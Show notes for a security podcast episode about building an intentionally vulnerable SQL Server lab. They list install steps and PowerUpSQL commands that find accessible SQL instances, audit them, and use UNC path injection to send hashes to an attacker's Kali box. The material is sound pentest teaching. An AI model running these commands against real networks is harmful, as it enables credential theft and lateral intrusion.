Preview Mode Links will not work in preview mode

7 Minute Security

Apr 14, 2023

Hey friends, today we're talking about building an intentionally vulnerable SQL server, and here are the key URLs/commands talked about in the episode:

  • Download SQL Server here

  • Install SQL via config .ini file

  • Or, install SQL via pure command line

  • Deploy SQL with a service account while also starting TCP/IP and named pipes automagically:

  • Run PowerUpSQL to find vulnerable SQL servers:
 $Targets = Get-SQLInstanceDomain -Verbose | Get-SQLConnectionTestThreaded -Verbose -Threads 10 | Where-Object {$_.Status -like "Accessible"} 
  • Audit the discovered SQL servers:
 Get-SQLInstanceDomain -verbose | invoke-sqlaudit -verbose 
  • Fire off stored procedures to catch hashes!
 Invoke-SQLUncPathInjection -verbose -captureIP IP.OF-YOUR.KALI.BOX